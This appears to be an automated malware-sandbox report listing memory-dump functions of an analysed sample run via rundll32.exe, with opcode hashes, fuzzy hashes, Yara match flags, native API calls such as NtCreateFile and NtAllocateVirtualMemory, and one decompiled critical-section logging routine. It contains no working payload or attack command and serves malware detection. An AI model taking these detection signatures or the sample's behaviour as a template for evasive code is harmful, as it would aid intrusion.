                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49B00, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 63a49d2f34be801f8be5a4c13cc023efd8972f5e5a181b6e4bbd6518b6eec37b
                                                                                                                          • Instruction ID: 7e059550ac9cd0fe813c07f0b143804b59d5fcd75d57b298bf6bf8d73168e75d
                                                                                                                          • Opcode Fuzzy Hash: 63a49d2f34be801f8be5a4c13cc023efd8972f5e5a181b6e4bbd6518b6eec37b
                                                                                                                          • Instruction Fuzzy Hash: A990026124100803D251716984147070006E7D0742F51C021A4014554D866689A9B6F1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A495F0, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e29aa6309b2046c451b9fa21c54aebabf61f437237750c172440827b66a86ca4
                                                                                                                          • Instruction ID: 0ec7667788d7ba64c09a9b01173b1ecc9dc5ca75eb6eaf9018ff1c73f168dbfa
                                                                                                                          • Opcode Fuzzy Hash: e29aa6309b2046c451b9fa21c54aebabf61f437237750c172440827b66a86ca4
                                                                                                                          • Instruction Fuzzy Hash: 7290027120100803D215616948046860005E7D0342F51C021AA014655E96B588D5B171
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49520, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d0480fad5e30daf3d15c5d6e1f4c72e403ea1bd0d58333702e60d23fa699916f
                                                                                                                          • Instruction ID: a5fc4bb1b518889bab89f84e1e612e2986941a9bf6f034595627cb4dda520619
                                                                                                                          • Opcode Fuzzy Hash: d0480fad5e30daf3d15c5d6e1f4c72e403ea1bd0d58333702e60d23fa699916f
                                                                                                                          • Instruction Fuzzy Hash: 939002E1201140934611A2698404B0A4505E7E0342B51C026E5044560CC5758895E175
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A4AD30, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 787b971ff77c527b5a5f2db7419fd161b68749aee97bfa10e7ca59924c17b607
                                                                                                                          • Instruction ID: 819c523eb183b4270fa0ef3f8ecf62aa0718669270f079081d06a66eda950cd4
                                                                                                                          • Opcode Fuzzy Hash: 787b971ff77c527b5a5f2db7419fd161b68749aee97bfa10e7ca59924c17b607
                                                                                                                          • Instruction Fuzzy Hash: DD900271A05000139251716948146464006F7E0782B55C021A4504554C89A48A99A3E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49560, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9328a6dc6c9b0c951d1700fb511d4355f31e6113fac91ee3a2e548b80cc97051
                                                                                                                          • Instruction ID: b2cf2bad8de600511bb8e3ac2253120b3fc335cf9e0d9c4fc996e297be029935
                                                                                                                          • Opcode Fuzzy Hash: 9328a6dc6c9b0c951d1700fb511d4355f31e6113fac91ee3a2e548b80cc97051
                                                                                                                          • Instruction Fuzzy Hash: DF900265221000030256A569060450B0445F7D6392391C025F5406590CC67188A9A361
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A496D0, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: aefc6aa0047f3f46882052f4db6e6944d8d9f00e8b8def9c6cbcc7c03b8736c9
                                                                                                                          • Instruction ID: 7f3b55cccd44b96df3ce2e803f6e84d46b45ed45473b8a6ecc22e5199adade46
                                                                                                                          • Opcode Fuzzy Hash: aefc6aa0047f3f46882052f4db6e6944d8d9f00e8b8def9c6cbcc7c03b8736c9
                                                                                                                          • Instruction Fuzzy Hash: 9090027120100843D21161694404B460005E7E0342F51C026A4114654D8665C895B561
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49610, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 55c7572007fa60db98f08a96a87e0755345136ce421ac9cb179c162a5bc04f8e
                                                                                                                          • Instruction ID: 1969d06d9d3496e0f36f492f63f6003c2adf6d4670c5dcff35c34a0a6a726f3d
                                                                                                                          • Opcode Fuzzy Hash: 55c7572007fa60db98f08a96a87e0755345136ce421ac9cb179c162a5bc04f8e
                                                                                                                          • Instruction Fuzzy Hash: 7090027160500803D261716944147460005E7D0342F51C021A4014654D87A58A99B6E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49650, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ebb721deec77e682b9e1ae74a0ef45446963a6eda769695ac6b8e908429e73f6
                                                                                                                          • Instruction ID: d5485bb833f81c9cb29c7298f09912094db676a13c1e03907dd6982adbd80b7f
                                                                                                                          • Opcode Fuzzy Hash: ebb721deec77e682b9e1ae74a0ef45446963a6eda769695ac6b8e908429e73f6
                                                                                                                          • Instruction Fuzzy Hash: EF90027120504843D25171694404A460015E7D0346F51C021A4054694D96758D99F6A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49730, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e0c7cffa82ec836a64be92868a9b4f42abfc5a882a4dd776715dce7529100e31
                                                                                                                          • Instruction ID: 3bb52d245a4a8d8dbd2cfaf84f9634c5d87ddb40de0fa01db3ffdb3c1fd08539
                                                                                                                          • Opcode Fuzzy Hash: e0c7cffa82ec836a64be92868a9b4f42abfc5a882a4dd776715dce7529100e31
                                                                                                                          • Instruction Fuzzy Hash: 2A90026160500403D251716954187060015E7D0342F51D021A4014554DC6A98A99B6E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A4A710, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4b00b7f439efc14d6841e7089213aa37f780616aa4a34fcbf0ea37647507cbf2
                                                                                                                          • Instruction ID: 4fed43aec20f879d244a96891f56089b9742b5fac8a2010aa7fc697f92818bd6
                                                                                                                          • Opcode Fuzzy Hash: 4b00b7f439efc14d6841e7089213aa37f780616aa4a34fcbf0ea37647507cbf2
                                                                                                                          • Instruction Fuzzy Hash: DD900271301000539611A6A95804A4A4105E7F0342B51D025A8004554C85A488A5A161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49760, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ff36bae6418b5be2706ee54de35d2ed0a2818cc762d853d2496c29149c1416d1
                                                                                                                          • Instruction ID: 2bef6749e95e4eaffd5fe54a56269f45dc9e290a63a5e92e668d9b25185b4e65
                                                                                                                          • Opcode Fuzzy Hash: ff36bae6418b5be2706ee54de35d2ed0a2818cc762d853d2496c29149c1416d1
                                                                                                                          • Instruction Fuzzy Hash: 4890027120100403D211616955087070005E7D0342F51D421A4414558DD6A68895B161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49770, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 2ee1449c9d8fc6d112ef7608d9f685f7b63bb28e2a6fbacc0baafb5c6a344a84
                                                                                                                          • Instruction ID: cfa6111913af4efd17efcc308eb0b62b0b27411b4b67914e2aff7d76574cc08f
                                                                                                                          • Opcode Fuzzy Hash: 2ee1449c9d8fc6d112ef7608d9f685f7b63bb28e2a6fbacc0baafb5c6a344a84
                                                                                                                          • Instruction Fuzzy Hash: 7D90026120504443D21165695408A060005E7D0346F51D021A5054595DC6758895F171
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A4A770, Relevance: .0, Instructions: 4COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9aba4892918133ef9bee190533f2ba80d4b818b0a9181c6cd643e4d1235953b7
                                                                                                                          • Instruction ID: d898b98534a8e8d0f13f5fe338b2acc67927a7cc9c71be38e8b090d90dc345a7
                                                                                                                          • Opcode Fuzzy Hash: 9aba4892918133ef9bee190533f2ba80d4b818b0a9181c6cd643e4d1235953b7
                                                                                                                          • Instruction Fuzzy Hash: 8290027520504443D61165695804A870005E7D0346F51D421A441459CD86A488A5F161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A49670, Relevance: .0, Instructions: 2COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                          • Instruction ID: d3e26ec99b546ce764cf27ec5fccbbd13b2b246e5416ca2ae4aab3feb16d02bd
                                                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A9FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 53%
                                                                                                                          			E00A9FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00A4CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00A95720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00A95720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                          0x00a9fdda
                                                                                                                          0x00a9fde2
                                                                                                                          0x00a9fde5
                                                                                                                          0x00a9fdec
                                                                                                                          0x00a9fdfa
                                                                                                                          0x00a9fdff
                                                                                                                          0x00a9fe0a
                                                                                                                          0x00a9fe0f
                                                                                                                          0x00a9fe17
                                                                                                                          0x00a9fe1e
                                                                                                                          0x00a9fe19
                                                                                                                          0x00a9fe19
                                                                                                                          0x00a9fe19
                                                                                                                          0x00a9fe20
                                                                                                                          0x00a9fe21
                                                                                                                          0x00a9fe22
                                                                                                                          0x00a9fe25
                                                                                                                          0x00a9fe40

                                                                                                                          APIs
                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A9FDFA
                                                                                                                          Strings
                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A9FE2B
                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A9FE01
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.381724356.00000000009E0000.00000040.00000001.sdmp, Offset: 009E0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                          • API String ID: 885266447-3903918235
                                                                                                                          • Opcode ID: 56d8e72654405563a8ffb95d3bd84b11b48ee170e74613cfb83fd8ec3996c458
                                                                                                                          • Instruction ID: f9777dde4f8a5118051e18914841f152b5170893f61db5a15f5c931e5081b0a8
                                                                                                                          • Opcode Fuzzy Hash: 56d8e72654405563a8ffb95d3bd84b11b48ee170e74613cfb83fd8ec3996c458
                                                                                                                          • Instruction Fuzzy Hash: 46F0C232640601BFDA211A95DD07F23BBAAEB84730F240214F628965E1DA62A92097A0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Analysis Process: rundll32.exe PID: 6820 Parent PID: 3440 rundll32.exeCOMMON

                                                                                                                          Executed Functions

                                                                                                                          Function 02C181D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02C13BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02C13BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02C1821D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 823142352-1441809116
                                                                                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                          • Instruction ID: 6d03a0b165803c8e75535f6414b20364df9811811f2e164ebca381ed507c02c8
                                                                                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                          • Instruction Fuzzy Hash: 07F0BDB2204208ABCB08DF88DC85EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C18222, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,02C13BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02C13BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02C1821D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID: .z`
                                                                                                                          • API String ID: 823142352-1441809116
                                                                                                                          • Opcode ID: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
                                                                                                                          • Instruction ID: c42b6459730d8d3380ea2a22e2053963afac91c8fc32eda0c4a205c5a99de01d
                                                                                                                          • Opcode Fuzzy Hash: a35495c9fa1f261774ecf75b376189285d3fef53a1587834856adc40d1aeb616
                                                                                                                          • Instruction Fuzzy Hash: DCF0F8B2218148AF8B44CF9CDD94CEB77ADEB8D210B14465CFA5CC7204C631E8028B64
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C183AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memorynativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02C02D11,00002000,00003000,00000004), ref: 02C183E9
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID: 6HCU
                                                                                                                          • API String ID: 2167126740-1255677348
                                                                                                                          • Opcode ID: 5ca195d08c7bb1ddaf8ea49b38e0745b3ab2388370f426f41256d273ac7716ab
                                                                                                                          • Instruction ID: f7aed17ebe44e165b9bb94391e0f31c4b02ebb8cfbb51afaf02ef3d4fdc21882
                                                                                                                          • Opcode Fuzzy Hash: 5ca195d08c7bb1ddaf8ea49b38e0745b3ab2388370f426f41256d273ac7716ab
                                                                                                                          • Instruction Fuzzy Hash: B3F0F8B5204209ABDB14DF98CC81EEB77A9AF8C750F158249BE5897251D630E911CBE0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C18280, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtReadFile.NTDLL(02C13D62,5E972F59,FFFFFFFF,02C13A21,?,?,02C13D62,?,02C13A21,FFFFFFFF,5E972F59,02C13D62,?,00000000), ref: 02C182C5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                          • Instruction ID: dbf9057529a73a60db02dcdc78bb05e5a39fb5787bf27f31dfe497f77543d12d
                                                                                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                          • Instruction Fuzzy Hash: 0EF0A4B2200208ABDB14DF89DC81EEB77ADAF8C754F158248BA1D97241D630E8118BA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C183B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02C02D11,00002000,00003000,00000004), ref: 02C183E9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateMemoryVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2167126740-0
                                                                                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                          • Instruction ID: 5d631f4375f930492290216fd0794abcb31684af51cc7c9614a041612a94e307
                                                                                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                          • Instruction Fuzzy Hash: B0F015B2200208ABDB14DF89CC81EAB77ADAF88750F118248BE0897241C630F810CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 02C18300, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • NtClose.NTDLL(02C13D40,?,?,02C13D40,00000000,FFFFFFFF), ref: 02C18325
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594004025.0000000002C00000.00000040.00000001.sdmp, Offset: 02C00000, based on PE: false
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Close
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3535843008-0
                                                                                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                          • Instruction ID: 4939d729691609217bf0a5a58d085459c440c09f63db4be707e01b9f181d9042
                                                                                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                          • Instruction Fuzzy Hash: 3ED012752003146BD710EF98CC45E97775DEF44750F154555BA185B241C570F90086E0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 045F9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp, Offset: 04590000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.594770100.00000000046AB000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000004.00000002.594779943.00000000046AF000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 5978210fe0863a0bee59b2f6e4e5ecb892bed7b270f8ec84215501926b120629
                                                                                                                          • Instruction ID: dfa8313bddccf678220f1e75611a1c53a125272a72bcdc01b11fcc0ec58d29ca
                                                                                                                          • Opcode Fuzzy Hash: 5978210fe0863a0bee59b2f6e4e5ecb892bed7b270f8ec84215501926b120629
                                                                                                                          • Instruction Fuzzy Hash: 3D9002A5211000032109A9990705507004A97D5395351C121F1006554CF6A1D8616161
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 045F95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp, Offset: 04590000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.594770100.00000000046AB000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000004.00000002.594779943.00000000046AF000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: e462dea2fb081346a253b12483712372b8712561977fc120627459eaf7821905
                                                                                                                          • Instruction ID: d401da28bab536fc9ef4522597fff513539b6a4605afa2c8c433f7697d9afa82
                                                                                                                          • Opcode Fuzzy Hash: e462dea2fb081346a253b12483712372b8712561977fc120627459eaf7821905
                                                                                                                          • Instruction Fuzzy Hash: 4A9002E120200003610975994415617400E97E0245B51C121E1005594DE5A5D8917165
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 045F9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp, Offset: 04590000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.594770100.00000000046AB000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000004.00000002.594779943.00000000046AF000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: 1d0b30f903db879777e745277a9126352c1dd242fb98115ea0207f6d74b94887
                                                                                                                          • Instruction ID: 4a03851aacc44109a41dc357b790cec5ea63e77723adea87dc4d9655a38a6ce6
                                                                                                                          • Opcode Fuzzy Hash: 1d0b30f903db879777e745277a9126352c1dd242fb98115ea0207f6d74b94887
                                                                                                                          • Instruction Fuzzy Hash: 0A9002B120504842F14475994405A47001997D0349F51C111A0055698DB6A5DD55B6A1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 045F9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp, Offset: 04590000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.594770100.00000000046AB000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000004.00000002.594779943.00000000046AF000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
                                                                                                                          • Opcode ID: ac6ac46e662b35653ef6c94646ab2df5b7171c8dfa3db4c2612c50d9208840c8
                                                                                                                          • Instruction ID: 14f1731ba5c6ddd480970f5dee683ea508db26fc07108aa1801ac4d2b7e9a060
                                                                                                                          • Opcode Fuzzy Hash: ac6ac46e662b35653ef6c94646ab2df5b7171c8dfa3db4c2612c50d9208840c8
                                                                                                                          • Instruction Fuzzy Hash: 949002B120100802F1847599440564B000997D1345F91C115A0016658DEA95DA5977E1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 045F96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000004.00000002.594480948.0000000004590000.00000040.00000001.sdmp, Offset: 04590000, based on PE: true
                                                                                                                          • Associated: 00000004.00000002.594770100.00000000046AB000.00000040.00000001.sdmp Download File
                                                                                                                          • Associated: 00000004.00000002.594779943.00000000046AF000.00000040.00000001.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2994545307-0
